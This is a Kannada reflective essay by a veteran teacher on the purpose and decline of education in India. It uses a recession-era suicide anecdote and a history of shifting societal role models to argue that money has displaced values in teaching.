ಶಿಕ್ಷಣವೆಂಬ ನಿಗೂಢ ತತ್ವ

ಇನ್ನೊಂದು ಎರಡು ದಶಕಗಳಲ್ಲಿ ಹಣ ಪ್ರಧಾನವಾದ ಸಮಾಜ ಬದಲಾಗಿ ಮತ್ತೊಂದು ಮೌಲ್ಯದ ಸಮಾಜ ಬಂದೀತು. ಆಗ ಹಣಕ್ಕಿಂತ ಮೌಲ್ಯ ಮುಖ್ಯ
ಎನ್ನಿಸಿದಾಗ, ಅದಕ್ಕೆ ಸಮಾಜದ ಸಹಕಾರ ದೊರೆತಾಗ ಮತ್ತೆ ಶಿಕ್ಷಣ ಮೌಲ್ಯಪ್ರಧಾನವಾದೀತು.

ನಾನು ಶಿಕ್ಷಕವೃತ್ತಿಯನ್ನು ಕೈಗೊಂಡು ನಲವತ್ತೇಳು ವರ್ಷಗಳಾದವು ಎಂಬುದನ್ನು ಮೊನ್ನೆ ನೆನೆಸಿಕೊಂಡಾಗ ಆಶ್ಚರ್ಯವೆನ್ನಿಸಿತು. ಇದಕ್ಕೆ ಕಾರಣ ನಾನು ಇಷ್ಟು ದಿನ ಬದುಕಿ ಉಳಿದೆನಲ್ಲ ಎಂದಲ್ಲ, ಇಷ್ಟು ವರ್ಷಗಳಾದರೂ ಇನ್ನೂ ಹೊಸಬನಾಗಿಯೇ ಉಳಿದಿದ್ದೇನಲ್ಲ ಎಂಬುದಕ್ಕೆ. ನಾನು ಅಂದು ಕಲಿಸಲು ಪ್ರಾರಂಭಿಸಿದ್ದಾಗ ಶಿಕ್ಷಣ ಎಷ್ಟು ನಿಗೂಢವೆಂದು ತೋರುತ್ತಿತ್ತೋ, ಇಂದಿಗೂ ನನಗದು ಅಷ್ಟೇ ನಿಗೂಢವಾಗಿ ಉಳಿದಿದೆ. ನಿಜ ಹೇಳಬೇಕೆಂದರೆ ಈಗ ಮೊದಲಿಗಿಂತ ಹೆಚ್ಚು ನಿಗೂಢವಾಗಿ ತೋರುತ್ತದೆ.

ನಾವೀಗ ನೀಡುತ್ತಿರುವುದು ಶಿಕ್ಷಣವೇ? ಅದರ ದಿಕ್ಕು, ಪ್ರಮಾಣಗಳು ಸರಿಯೇ? ಶಿಕ್ಷಣದ ಉದ್ದೇಶವೇನು? ಅದು ಸಫಲವಾಗಿದೆಯೇ? ಅದರ ಸಫಲತೆಯ ಸಾಕ್ಷಿಗಳೇನು? ಇಂಥ ಅನೇಕ ಪ್ರಶ್ನೆಗಳು ನನ್ನನ್ನು ಕಾಡಿವೆ, ಕಾಡುತ್ತಲೇ ಇವೆ.

ನನಗೊಂದು ಘಟನೆ ನೆನಪಾಗುತ್ತದೆ. ಎಂಟು-ಒಂಬತ್ತು ವರ್ಷಗಳ ಹಿಂದೆ ಅಮೆರಿಕೆಯ ಲಾಸ್-ಎಂಜಲೆಸ್ ನಗರಕ್ಕೆ ಹೋಗಿದ್ದೆ. ಅಲ್ಲಿಯ ನನ್ನ ಸ್ನೇಹಿತರೊಬ್ಬರು ಒಂದು ಮನೆಗೆ ಕರೆದೊಯ್ದರು. ಆ ಮನೆಯಲ್ಲಿ ಒಂದು ಅನಾಹುತ ನಡೆದುಹೋಗಿದೆ. ಮನೆಯ ಯಜಮಾನ, ಅವನಿಗೆ ಸುಮಾರು ಮೂವತ್ತೊಂಬತ್ತು ವರ್ಷ ವಯಸ್ಸಂತೆ, ಆತ್ಮಹತ್ಯೆ ಮಾಡಿಕೊಂಡಿದ್ದ. ಅದೊಂದು ಚೆಂದದ ಮನೆ. ಮನೆಯಲ್ಲಿದ್ದವರು ನಾಲ್ಕೇ ಜನ: ಗಂಡ, ಹೆಂಡತಿ, ಹತ್ತು ವರ್ಷದ ಮಗಳು ಹಾಗೂ ಆರು ವರ್ಷದ ಮಗ. ಈಗ ತೀರಿಹೋದವನು ಗಂಡ.

ಅವನ ವಾರ್ಷಿಕ ಸಂಬಳ, ಭಾರತದ ರೂಪಾಯಿಯಲ್ಲಿ ಹೇಳುವುದಾದರೆ, ಸುಮಾರು ನಾಲ್ಕು ಕೋಟಿ ರೂಪಾಯಿಗಳು! ಅವನೇಕೆ ಅತ್ಮಹತ್ಯೆ ಮಾಡಿಕೊಂಡ? ಆಗ ಅಮೆರಿಕೆಯಲ್ಲಿ ಆರ್ಥಿಕ ಹಿಂಜರಿತದ ಪರಿಣಾಮಗಳು ಕಾಣುತ್ತಿದ್ದವು.

ಅವನ ಶಿಕ್ಷಣದ ಬಗ್ಗೆ ನಾನು ಹೇಳಬೇಕು. ಆತ ಐ.ಐ.ಟಿ.ಯಲ್ಲಿ ಬಿ.ಟೆಕ್ ಮಾಡಿ, ಐ.ಐ.ಎಮ್ ನಿಂದ ಎಮ್.ಬಿ.ಎ. ಮಾಡಿದ್ದ. ಅವನಿಗೆ ಒಂದು ದೊಡ್ಡ ಕಂಪನಿಯಲ್ಲಿ ಕೆಲಸ ದೊರೆತು ಬಹಳ ಬೇಗನೇ ವೃತ್ತಿಯಲ್ಲಿ ಪ್ರಗತಿ ಸಾಧಿಸಿದ್ದ. ಹಣಕ್ಕೇನೂ ಕೊರತೆ ಇರಲಿಲ್ಲ. ಆಗ ಅವನ ವಾರ್ಷಿಕ ಸಂಬಳ, ಭಾರತದ ರೂಪಾಯಿಯಲ್ಲಿ ಹೇಳುವುದಾದರೆ, ಸುಮಾರು ನಾಲ್ಕು ಕೋಟಿ ರೂಪಾಯಿಗಳು! ಅವನೇಕೆ ಅತ್ಮಹತ್ಯೆ ಮಾಡಿಕೊಂಡ? ಆಗ ಅಮೆರಿಕೆಯಲ್ಲಿ ಆರ್ಥಿಕ ಹಿಂಜರಿತದ ಪರಿಣಾಮಗಳು ಕಾಣುತ್ತಿದ್ದವು. ಅತನ ಗೆಳೆಯ, ಅವನೂ ಸರಿಸುಮಾರು ಅಂಥದೇ ಹುದ್ದೆಯಲ್ಲಿ ಇರುವವನು, ಕೆಲಸ ಕಳೆದುಕೊಂಡ. ಈತನಿಗೆ ಭಯವಾಯಿತು. ಮುಂದಿನ ಕೊಡಲಿ ಏಟು ತನ್ನ ಕತ್ತಿನ ಮೇಲೆಯೇ ಎಂದು ಭಾವಿಸಿದ ಈತ ಆತ್ಮಹತ್ಯೆ ಮಾಡಿಕೊಂಡ. ಇದಷ್ಟು ವಿಷಯವನ್ನು ಅವನ ಸುಂದರ ಪತ್ನಿ ಬಿಕ್ಕುತ್ತ ಹೇಳಿದಳು. ನನಗೆ ಆ ತಕ್ಷಣಕ್ಕೆ ಅನ್ನಿಸಿದ್ದು ಏನು ಗೊತ್ತೇ? ನಮ್ಮ ಶಿಕ್ಷಣ ಸಂಪೂರ್ಣವಾಗಿ ಸೋತು ಹೋಯಿತು.

ಇಷ್ಟು ಉತ್ತಮ ಶಿಕ್ಷಣ ಪಡೆದ ವ್ಯಕ್ತಿಗೆ ಮತ್ತೊಂದು ಕೆಲಸ ದೊರೆತೀತು, ಸ್ವಲ್ಪ ಕಾಲ ದೊರಕದಿದ್ದರೇನಂತೆ, ಮತ್ತೊಂದು ಕೆಲಸಕ್ಕೆ ಪ್ರಯತ್ನಿಸುತ್ತೇನೆ ಎಂಬ ಆತ್ಮವಿಶ್ವಾಸ ಕರಗಿ ಹೋಯಿತೆ? ಜೀವನದಲ್ಲಿ ಬಂದ ಒಂದು ಆಪತ್ತನ್ನು ಧೈರ್ಯದಿಂದ ಎದುರಿಸುವ ಆತ್ಮವಿಶ್ವಾಸವನ್ನು ಈ ಶ್ರೇಷ್ಠ (?) ಶಿಕ್ಷಣ ಕೊಡದೇ ಹೋಯಿತೆ? ಯಾವ ಶಿಕ್ಷಣ ನಮಗೆ ಎಂಥದೇ ಸಂದರ್ಭದಲ್ಲಿ ಅತ್ಮವಿಶ್ವಾಸವನ್ನು ನೀಡಬೇಕಿತ್ತೋ ಅದೇ ಶಿಕ್ಷಣ ನಮ್ಮಿಂದ ಆತ್ಮವಿಶ್ವಾಸವನ್ನು ಕಿತ್ತುಕೊಂಡಿತೋ ಎಂದು ಎನ್ನಿಸಿದ್ದು ಸತ್ಯ. ಇದೊಂದು ಅಪವಾದದ ಘಟನೆ ಎಂದುಕೊಂಡರೂ ಇತ್ತೀಚೆಗೆ ಸಣ್ಣಸಣ್ಣ ಕಾರಣಗಳಿಗೆ ಆತ್ಮಹತ್ಯೆ ಮಾಡಿಕೊಳ್ಳುವ ತರುಣ-ತರುಣಿಯರನ್ನು ಕಂಡಾಗ ಇದು ಸತ್ಯ ಎನ್ನಿಸದಿರದು.

ನಿಮ್ಮ ಮನೆಗೆ ಬರುವ ಇಲೆಕ್ಟ್ರಿಶಿಯನ್ ಆಗಲಿ, ನಲ್ಲಿ ರಿಪೇರಿ ಮಾಡುವವನಿಗಾಗಲೀ, ಬಡಗಿಗಾಗಲೀ, ಗಾರೆ ಕೆಲಸದವನಿಗಾಗಲೀ ಕೆಲಸ ಹೋಗುವ ಭಯವಿಲ್ಲ. ಯಾಕೆಂದರೆ ಅವರಿಗೆ ತಮ್ಮಲ್ಲಿ ಕರಗತವಾಗಿರುವ ಕೌಶಲ್ಯಗಳ ಬಗ್ಗೆ ಖಾತ್ರಿ ಇದೆ. ಆದರೆ ನಮ್ಮ ಸ್ನಾತಕೋತ್ತರ ಪದವಿ ಪಡೆದ ಹುಡುಗರಿಗೆ ಭಯವೇಕೆ?

ನಿಮ್ಮ ಮನೆಯಲ್ಲಿ ಕಸ, ಮುಸುರೆ ಮಾಡುವ ಹೆಣ್ಣುಮಗಳಿಗೆ, ‘ನಾಳೆಯಿಂದ ಕೆಲಸಕ್ಕೆ ಬರಬೇಡ’ ಎಂದು ಹೇಳಿನೋಡಿ. ಆಕೆಗೆ ಯಾವ ಭಯವೂ ಆಗುವುದಿಲ್ಲ. ಈಗಿನ ದಿನಗಳಲ್ಲಿ ಆಕೆ ಎಲ್ಲಿ ಬಿಟ್ಟುಹೋಗುತ್ತಾಳೋ ಎಂಬ ಭಯ ಮನೆಯವರಿಗೆ ಇರುತ್ತದೆ. ಆಕೆ, ‘ಆಯ್ತು ಬಿಡಿ, ಮತ್ತೆ ನಾಲ್ಕು ಮನೆ ಸಿಗುತ್ತದೆ’ ಎನ್ನುತ್ತಾಳೆ. ಆಕೆಗೆ ಕೆಲಸ ಕಳೆದುಕೊಳ್ಳುವ ಭಯವಿಲ್ಲ. ನಿಮ್ಮ ಮನೆಗೆ ಬರುವ ಇಲೆಕ್ಟ್ರಿಶಿಯನ್ ಆಗಲಿ, ನಲ್ಲಿ ರಿಪೇರಿ ಮಾಡುವವನಿಗಾಗಲೀ, ಬಡಗಿಗಾಗಲೀ, ಗಾರೆ ಕೆಲಸದವನಿಗಾಗಲೀ ಕೆಲಸ ಹೋಗುವ ಭಯವಿಲ್ಲ. ಯಾಕೆಂದರೆ ಅವರಿಗೆ ತಮ್ಮಲ್ಲಿ ಕರಗತವಾಗಿರುವ ಕೌಶಲ್ಯಗಳ ಬಗ್ಗೆ ಖಾತ್ರಿ ಇದೆ. ಆದರೆ ನಮ್ಮ ಸ್ನಾತಕೋತ್ತರ ಪದವಿ ಪಡೆದ ಹುಡುಗರಿಗೆ ಭಯವೇಕೆ? ನಾವು ಇಷ್ಟು ವರ್ಷ ಕಲಿತರೂ ಯಾವ ಕೌಶಲ್ಯವನ್ನು ಪಡೆಯಲಿಲ್ಲ ಎಂಬ ಚಿಂತೆಯೇ? ಅಥವಾ ನಾನು ಕಲಿತದ್ದು ಬದುಕಲಿಕ್ಕೆ ಅವಶ್ಯವಾಗಿ ಬೇಕಾಗುವ ಯಾವ ಸಾಮಗ್ರಿಯನ್ನೂ ಒದಗಿಸಲಿಲ್ಲವೆಂದೇ?

ನಮ್ಮ ಶಿಕ್ಷಣದ ಗುಣಮಟ್ಟದ ಬಗ್ಗೆ ಎಲ್ಲರೂ ಮಾತನಾಡುತ್ತಾರೆ. ಅದು ಅಪೇಕ್ಷಿತ ಮಟ್ಟದಲ್ಲಿಲ್ಲ ಎಂಬ ಅಭಿಪ್ರಾಯ ಸಾರ್ವತ್ರಿಕವಾಗುತ್ತಿದೆ. ಶಿಕ್ಷಣದಲ್ಲಿ ಯಾವ ಕಾಲಕ್ಕೂ ಸಲ್ಲುವ ಒಂದು ಸಿದ್ಧಾಂತವೆಂದರೆ, ಶಿಕ್ಷಣದ ಗುಣಮಟ್ಟದ ನಿರ್ಧಾರವಾಗುವುದು ಶಿಕ್ಷಕರ ಗುಣಮಟ್ಟದ ಮೇಲೆ. ಅರ್ಧ ಶತಮಾನದ ಹಿಂದೆ ಇದ್ದ ಶಿಕ್ಷಕರ ಬದ್ಧತೆ ಈಗ ಕಾಣುತ್ತಿಲ್ಲ, ಶಿಕ್ಷಕರ ಓದಿನ ಆಳ, ಹರಹು ಈಗ ತುಂಬ ಸೊರಗಿಹೋಗಿವೆ, ಮಕ್ಕಳೊಂದಿಗಿನ ಭಾವನಾತ್ಮಕ ಸಂಬಂಧ ಮರೆತುಹೋಗಿ ಅದೊಂದು ಕೊಡು-ಕೊಳ್ಳುವ ವ್ಯವಹಾರವಾಗಿ ನಿಂತಿದೆ ಎಂಬ ಎಲ್ಲ ಮಾತುಗಳು ದಟ್ಟವಾಗುತ್ತಿವೆ. ಇವುಗಳಲ್ಲಿ ಸತ್ಯವಿಲ್ಲ ಎನ್ನುವಂತಿಲ್ಲ. ಎಲ್ಲರೂ ಹಾಗೆಯೇ ಇದ್ದಾರೆ ಎಂದು ಹೇಳುವುದು ಸರಿಯಲ್ಲವಾದರೂ ಬಹುಪಾಲು ಶಿಕ್ಷಕರಿಗೆ ತಮ್ಮ ಜವಾಬ್ದಾರಿಯ ಅರಿವಿಲ್ಲವೆಂಬುವುದು ಒಪ್ಪಬೇಕಾದದ್ದೇ.

ನಾನು ಶಾಲೆಯಲ್ಲಿ ಕಲಿಯುವಾಗ ಒಂದು ಪ್ರಬಂಧದ ಪ್ರಾರಂಭದಲ್ಲಿ ‘ಒಂದೂರಿನಲ್ಲಿ ಒಬ್ಬ ಬಡ ಮೇಷ್ಟ್ರರಿದ್ದರು’ ಎಂದು ಬರೆದಿದ್ದೆ. ನನ್ನ ಗುರುಗಳಿಗೆ ಕೆಂಡದಂಥ ಕೋಪ, ‘ಮೂರ್ಖಾ, ಒಂದೇ ಸಾಲಿನಲ್ಲಿ ಎರಡೆರಡು ವಿಶೇಷಣಗಳನ್ನು ಬಳಸಬಾರದೆಂದು ಹೇಳಿಲ್ಲವೇ?’ ಎಂದು ಗದರಿದರು. ನಾನು, ‘ನಾನು ಹಾಗೆಲ್ಲಿ ಬರೆದಿದ್ದೇನೆ?’

ಯಾಕೆ ಹೀಗಾಯಿತು? ನಲವತ್ತು-ಐವತ್ತು ವರ್ಷಗಳ ಹಿಂದೆ ಶಿಕ್ಷಕರಿಗೆ ಇದ್ದ ಗೌರವ ಈಗ ಏಕಿಲ್ಲ? ಅದಕ್ಕೆ ಕಾರಣಗಳೇನು ಎಂಬುದನ್ನು ಚಿಂತಿಸುವುದು ಅವಶ್ಯ. ಅರ್ಧಶತಮಾನದ ಹಿಂದೆ ಶಿಕ್ಷಕರಿಗೆ ಹೆಚ್ಚಿನ ಸಂಬಳ-ಸವಲತ್ತುಗಳಿರಲಿಲ್ಲ. ಯಾವತ್ತಿಗೂ ಶಿಕ್ಷಕರಿಗೆ ಕಡಿಮೆ ಸಂಬಳವೇ ಎಂಬ ಮಾತಿತ್ತು. ನಾನು ಶಾಲೆಯಲ್ಲಿ ಕಲಿಯುವಾಗ ಒಂದು ಪ್ರಬಂಧದ ಪ್ರಾರಂಭದಲ್ಲಿ ‘ಒಂದೂರಿನಲ್ಲಿ ಒಬ್ಬ ಬಡ ಮೇಷ್ಟ್ರರಿದ್ದರು’ ಎಂದು ಬರೆದಿದ್ದೆ. ನನ್ನ ಗುರುಗಳಿಗೆ ಕೆಂಡದಂಥ ಕೋಪ, ‘ಮೂರ್ಖಾ, ಒಂದೇ ಸಾಲಿನಲ್ಲಿ ಎರಡೆರಡು ವಿಶೇಷಣಗಳನ್ನು ಬಳಸಬಾರದೆಂದು ಹೇಳಿಲ್ಲವೇ?’ ಎಂದು ಗದರಿದರು. ನಾನು, ‘ನಾನು ಹಾಗೆಲ್ಲಿ ಬರೆದಿದ್ದೇನೆ?’ ಎಂದು ಹೆದರಿ ಕೇಳಿದರೆ ಅವರು, ‘ಮತ್ತೇನು ಬರೆದಿದ್ದೀ ನೋಡು. ಮೇಷ್ಟ್ರು ಎಂದರೇ ಬಡವರು ಎಂದರ್ಥ. ಅದಕ್ಕೆ ಬಡ ಎಂಬ ಮತ್ತೊಂದು ವಿಶೇಷಣ ಏಕೆ?’ ಎಂದು ಹೇಳಿ ನಕ್ಕರು.

ಆದರೆ ಸಮಾಜ ಅವರಿಗೆ ಕೊಡುತ್ತಿದ್ದ ಗೌರವ ಅಪಾರವಾದದ್ದು. ಅದಕ್ಕೆ ಕಾರಣವೆಂದರೆ ಆ ಶಿಕ್ಷಕರಿಗೆ ತಮ್ಮ ವಿದ್ಯಾರ್ಥಿಗಳ ಬಗ್ಗೆ ಇದ್ದ ಅತ್ಯಂತ ಕಾಳಜಿ, ಅಕಾರಣ ಪ್ರೀತಿ. ಶಿಕ್ಷಕರಿಗೆ ಬೇರೆ ಹವ್ಯಾಸಗಳು ಇರಲಿಲ್ಲ. ಅವರ ಕನಿಷ್ಠ ಅವಶ್ಯಕತೆಗಳನ್ನು ಸಮಾಜ ಪೂರೈಸುತ್ತಿತ್ತು. ಅವರ ಮಾತಿಗೆ ತುಂಬ ಬೆಲೆ ಇರುತ್ತಿತ್ತು. ಶಿಕ್ಷಕತ್ವ ಒಂದು ಹೊಟ್ಟೆ ಹೊರೆಯುವ ಉದ್ಯೋಗವಾಗದೆ ಅದೊಂದು ವಿಶೇಷ ಮನೋಧರ್ಮವಾಗಿತ್ತು. ದಶಕಗಳು ಉರುಳಿದಂತೆ ಈ ಮನೋಧರ್ಮದಲ್ಲಿ ಆದ ಬದಲಾವಣೆ ಸ್ಪಷ್ಟವಾಗಿ ಕಾಣುತ್ತದೆ.

ಈ ಸಂದರ್ಭದಲ್ಲಿ ನನ್ನದೇ ಆದ ಒಂದು ಸಣ್ಣ ಸಿದ್ದಾಂತವನ್ನು ಕುರಿತು ಹೇಳಬೇಕು. ಅದು ಭಾರತದ ಮಟ್ಟಿಗೆ ಹೆಚ್ಚು ಪ್ರಸ್ತುತ. ಜಗತ್ತಿನಲ್ಲಿ ಮನುಷ್ಯನೆಂಬ ಪ್ರಾಣಿ ಹುಟ್ಟಿ ಬಂದಂದಿನಿಂದ ಕೆಲವು ಕಾಲಘಟ್ಟಗಳಲ್ಲಿ ಅವನ ಮುಂದೆ ಕೆಲವು ಮಾದರಿಗಳು ಬಂದು ನಿಲ್ಲುತ್ತವೆ. ಆಗ ಬದುಕಿದ್ದ ಜನರೆಲ್ಲ ಅದನ್ನೇ ಮಾದರಿ ಎಂದು ಭಾವಿಸಿ ಅನುಸರಿಸುತ್ತಾರೆ. ವೇದಕಾಲದಲ್ಲಿ ನಮಗೆ ಮಾದರಿಯಾಗಿದ್ದವರು ಯಾರು? ಆಗಿನ ಕಾಲದ ಋಷಿಗಳು. ಆಗ ಜಾತಿಯ ಗೋಜಲು ಇರಲಿಲ್ಲ. ಯಾರು ಬೇಕಾದರೂ, ಪ್ರಯತ್ನದಿಂದ ಖುಷಿಯಾಗಬಹುದಿತ್ತು. ಕ್ಷತ್ರಿಯ ಕೌಶಿಕ ತನ್ನ ಶ್ರದ್ಧೆಯಿಂದ, ಪರಿಶ್ರಮದಿಂದ ಬ್ರಹ್ಮರ್ಷಿಯಾದ. ಋಷಿಗಳು ನಗರದಲ್ಲಿರಲಿಲ್ಲ. ಕಾಡಿನಲ್ಲಿ, ನದೀತೀರದಲ್ಲಿ ಆಶ್ರಮ ಕಟ್ಟಿಕೊಂಡು ಬದುಕಿದ ಋಷಿಗಳ ಕಾಲಿನಡಿ ಕುಳಿತು ರಾಜರು, ರಾಜಕುಮಾರರು ಶಿಕ್ಷಣ

ದೇಶಕ್ಕೋಸ್ಕರ ಪ್ರತಿಯೊಬ್ಬರೂ ಅನನ್ಯ ಕೊಡುಗೆ ನೀಡಿದರು. ಆದರೆ ಸ್ವಾತಂತ್ರ್ಯದ ನಂತರ ಒಬ್ಬ ಶ್ರೀಮಂತ ವ್ಯಕ್ತಿ ಮಾದರಿಯಾಗಿದ್ದಾನೆ. ಈಗ ಬದುಕಿರುವ ಬಹುತೇಕರಿಗೆ ಅದೇ ಮಾದರಿ. ಹಣ ಗಳಿಸಬೇಕು, ಎಷ್ಟು ಸಾಧ್ಯವೋ ಅಷ್ಟನ್ನು, ಎಷ್ಟು ಬೇಗ ಆದಷ್ಟು ಗಳಿಸಬೇಕು ಮತ್ತು ಹೇಗಾದರೂ ಗಳಿಸಬೇಕು. ಕೊನೆಯದು ತುಂಬ ಅಪಾಯಕಾರಿ.

ಪಡೆಯುತ್ತಿದ್ದರು. ಋಷಿಯ ಮಾತನ್ನು ಮೀರುವುದು ಚಕ್ರವರ್ತಿಗೂ ಸುಲಭವಾಗಿರಲಿಲ್ಲ. ಅದೊಂದು ಜ್ಞಾನಪ್ರಧಾನವಾದ ಸಮಾಜವಾಗಿತ್ತು. ಜ್ಞಾನಕ್ಕೆ, ಜ್ಞಾನಿಗೆ ಗೌರವ. ಎಲ್ಲರೂ ಹಾಗೆಯೇ ಆಗಬೇಕೆಂದು ಪ್ರಯತ್ನಿಸುತ್ತಿದ್ದರು. ಇತಿಹಾಸದಲ್ಲಿ ಸ್ವಲ್ಪ ಮುಂದೆ ಬರೋಣ. ಮಹಾಭಾರತದಲ್ಲಿ ನಾಯಕರು ಯಾರು? ಭೀಷ್ಮ, ದ್ರೋಣ, ಭೀಮ, ಅರ್ಜುನ, ದುರ್ಯೋಧನ, ಕರ್ಣ, ಇವರೆಲ್ಲ ಶೂರರೇ. ಬ್ರಾಹ್ಮಣರಾದ ದ್ರೋಣಾಚಾರ್ಯರು ಏನು ಮಾಡಿದರು? ಅವರು ಹೇಳಿಕೊಟ್ಟದ್ದು ಶಸ್ತ್ರವಿದ್ಯೆ. ತಾವೂ ಯುದ್ಧದಲ್ಲಿ ಭಾಗವಹಿಸಿದವರೇ. ಅಂತೆಯೇ ಪುರೋಹಿತರಾದ ಕೃಪಾಚಾರ್ಯರೂ ಯುದ್ಧಕ್ಕೇ ಇಳಿದರು.

ಕಾಡಿನಲ್ಲಿದ್ದ ತರುಣ ಏಕಲವ್ಯನಿಗೆ, ಅರ್ಜುನನ್ನು ಬಿಲ್ಲು ವಿದ್ಯೆಯಲ್ಲಿ ಮೀರಿಸುವ ಉತ್ಸಾಹ! ಒಟ್ಟಿನಲ್ಲಿ ಅದು ಶೌರ್ಯಪ್ರಧಾನ ಸಮಾಜ. ಜ್ಞಾನದ ಸ್ಥಾನವನ್ನು ಶೌರ್ಯ ಪಡೆದಿತ್ತು. ಅಷ್ಟು ಹಿಂದೆ ಹೋಗುವುದು ಬೇಡ. ಸ್ವಾತಂತ್ರ್ಯಪೂರ್ವದಲ್ಲಿ ನಮ್ಮ ಮುಂದಿದ್ದ ನಾಯಕರು, ಮಾದರಿಗಳು ಯಾರು? ಗಾಂಧಿ, ಪಟೇಲ್, ಬೋಸ್, ನೆಹರೂ, ಭಗತ್‍ಸಿಂಗ್, ಸುಖದೇವ್, ರಾಜಗುರು ಮುಂತಾದವರು. ಎಲ್ಲರೂ ದೇಶಭಕ್ತರೇ, ಆಗ ಪ್ರತಿಯೊಂದು ಹಳ್ಳಿಯಲ್ಲಿ ದೇಶಪ್ರೇಮದ ಮಾತು. ದೇಶಪ್ರೇಮಿಯ ಗುಣಗಾನ. ರಾಷ್ಟ್ರಪ್ರೇಮದ ದೇಶಭಕ್ತರೇ ಮಾದರಿಯಾಗಿದ್ದರು. ದೇಶಕ್ಕೋಸ್ಕರ ಪ್ರತಿಯೊಬ್ಬರೂ ಅನನ್ಯ ಕೊಡುಗೆ ನೀಡಿದರು. ಆದರೆ ಸ್ವಾತಂತ್ರ್ಯದ ನಂತರ ಒಬ್ಬ ಶ್ರೀಮಂತ ವ್ಯಕ್ತಿ ಮಾದರಿಯಾಗಿದ್ದಾನೆ. ಈಗ ಬದುಕಿರುವ ಬಹುತೇಕರಿಗೆ ಅದೇ ಮಾದರಿ. ಹಣ ಗಳಿಸಬೇಕು, ಎಷ್ಟು ಸಾಧ್ಯವೋ ಅಷ್ಟನ್ನು, ಎಷ್ಟು ಬೇಗ ಆದಷ್ಟು ಗಳಿಸಬೇಕು ಮತ್ತು ಹೇಗಾದರೂ ಗಳಿಸಬೇಕು. ಕೊನೆಯದು ತುಂಬ ಅಪಾಯಕಾರಿ. ಎಲ್ಲರೂ ಹೀಗೆ ಹಣ ಮಾಡುವ ಭರಾಟೆಯಲ್ಲಿ ಹೊರಟಾಗ, ತಕ್ಕಮಟ್ಟಿಗೆ ಅದನ್ನು ಸಾಧ್ಯವಾಗಿಸಿಕೊಂಡಾಗ, ಮೇಷ್ಟ್ರು ತಾನೇಕೆ ಹಿಂದೆ ಉಳಿಯಬೇಕು ಎಂದು ಎನ್ನಿಸಿದ್ದರೆ ಅದು ವಿಚಿತ್ರವೇನಲ್ಲ. ಅವರ ಮನಸ್ಸಿನಲ್ಲಿಯ ಆಸೆ, ಅಪೇಕ್ಷೆಗಳು ಮುಂದೆ ಬಂದಾಗ ಅದರ್ಶ, ಸಂಬಂಧಗಳು, ಹಿಂದೆ ಸರಿದವು.

ಬೇರೆ ಬೇರೆ ಕಡೆಗಳಲ್ಲಿ ಮನಸ್ಸನ್ನು ತೊಡಗಿಸಿದ ಶಿಕ್ಷಕರಿಗೆ ಮೊದಲಿನ ಓದಿನ ಆಳ, ವಿಸ್ತಾರ ಬೇಕಿಲ್ಲ, ಪರೀಕ್ಷೆಯಲ್ಲಿ ಒಳ್ಳೆಯ ಅಂಕಗಳನ್ನು ಪಡೆಯುವಷ್ಟು ಕಲಿಸಿದರೆ ಸಾಕು ಎಂಬ ಭಾವನೆ ಬಲಿಯಿತು.

ಬಡತನಕ್ಕೆ ತಾವು ಮಾತ್ರ ಏಕೆ ವಾರಸುದಾರರು ಎಂದುಕೊಂಡು ತಮ್ಮ ಮಕ್ಕಳಿಗೇ, ‘ನನ್ನ ತಲೆಗೇ ಈ ಮೇಷ್ಟ್ರ ಕೆಲಸ ಸಾಕು. ನೀನು ಐ.ಟಿ.ಗೆ ಹೋಗಿ ಹೆಚ್ಚು ಹಣ ಗಳಿಸಿ ಸುಖವಾಗಿರು’ ಎಂದು ಹೇಳುವಂತಾಯಿತು. ಹಣದ ಮಹಿಮೆಯೇ ಹಾಗೆ. ಬೇರೆಲ್ಲ ಮೌಲ್ಯಗಳನ್ನು ಹಿಂದೆ ನಿರ್ದಾಕ್ಷಿಣ್ಯವಾಗಿ ತಳ್ಳಿ ಬಿಡುತ್ತದೆ. ಶಿಕ್ಷಕರಿಗೆ ಮನೆಪಾಠ ಹೇಳುವ, ಬೇರೆ ಬೇರೆ ವ್ಯವಹಾರಗಳಲ್ಲಿ ತೊಡಗಿಕೊಳ್ಳುವ ವೃತ್ತಿ ಬೆಳೆಯಿತು, ಯಾವಾಗ ಮಕ್ಕಳ ಬಗ್ಗೆ ಆತ್ಯಂತಿಕವಾದ ಪ್ರೀತಿ ಕಡಿಮೆಯಾಯಿತೋ ಅದನ್ನು ಗುರುತಿಸಿದ ಸಮಾಜ ಅವರಿಗಿದ್ದ ವಿಶೇಷ ಗೌರವವನ್ನು ಕಡಿಮೆಮಾಡುತ್ತ ಅದನ್ನು ಒಂದು ಉದ್ಯೋಗವೆಂದು ಭಾವಿಸತೊಡಗಿತು. ಬೇರೆ ಎಲ್ಲ ಹೊಟ್ಟೆಹೊರೆಯುವ ವೃತ್ತಿಯಂತೆ ಇದೂ ಒಂದು ವೃತ್ತಿಯಾಯಿತು. ಬೇರೆ ಬೇರೆ ಕಡೆಗಳಲ್ಲಿ ಮನಸ್ಸನ್ನು ತೊಡಗಿಸಿದ ಶಿಕ್ಷಕರಿಗೆ ಮೊದಲಿನ ಓದಿನ ಆಳ, ವಿಸ್ತಾರ ಬೇಕಿಲ್ಲ, ಪರೀಕ್ಷೆಯಲ್ಲಿ ಒಳ್ಳೆಯ ಅಂಕಗಳನ್ನು ಪಡೆಯುವಷ್ಟು ಕಲಿಸಿದರೆ ಸಾಕು ಎಂಬ ಭಾವನೆ ಬಲಿಯಿತು. ಮಕ್ಕಳಿಗೂ ಈಗ ಶಿಕ್ಷಕ ಮೌಲ್ಯಗಳ ಮಾದರಿ ಎನ್ನಿಸದೆ, ವಿಷಯನ್ನು ತಿಳಿಸುವ, ಪರೀಕ್ಷೆಗೆ ತಯಾರಿ ಮಾಡಿಸುವ ಒಬ್ಬ ಉದ್ಯೋಗಿ ಎನ್ನಿಸಿದ.

